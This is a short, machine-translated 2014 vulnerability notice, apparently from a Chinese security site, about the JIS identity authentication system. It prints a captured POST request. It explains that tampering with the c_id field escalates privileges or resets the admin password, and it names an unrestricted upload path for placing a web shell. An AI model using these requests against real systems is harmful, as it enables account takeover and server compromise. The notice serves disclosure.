Dahan-pass version of the jis Unified identity authentication system vulnerabilities package-vulnerability warning-the black bar safety net

2014-01-25T00:00:00
ID MYHACK58:62201442022
Type myhack58
Reporter 佚名
Modified 2014-01-25T00:00:00

Description

For the system part of the function of the capture when found:

POST:

http://10.11.5.201:9080/jis/front/upduser_do.jsp

CONTENT:

c_id=0 0 0 0 0&vc_loginid=admin&vc_password=1 2 3 4 5 6&vc_pwd=1 2 3 4 5 6&vc_username=system administrator&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname=

Proven c_id for access control fields 0 0 0 0 0 is the administrator, vc_loginid for the login name, vc_password and

vc_pwd for the password

(1)The user privilege elevation:

In the Modify personal information capture, c_id modified to 0 0 0 0 can be promoted to System Administrator

(2)to reset the administrator password

The c_id to 0 0 0 0 0 and the login name vc_loginid changed the admin password to modify for their own can

(3)arbitrary file upload vulnerability

Upload address: http://url//jis/update/update.jsp

shell address:http://www. iswin. org/jis/update/data/Upload File name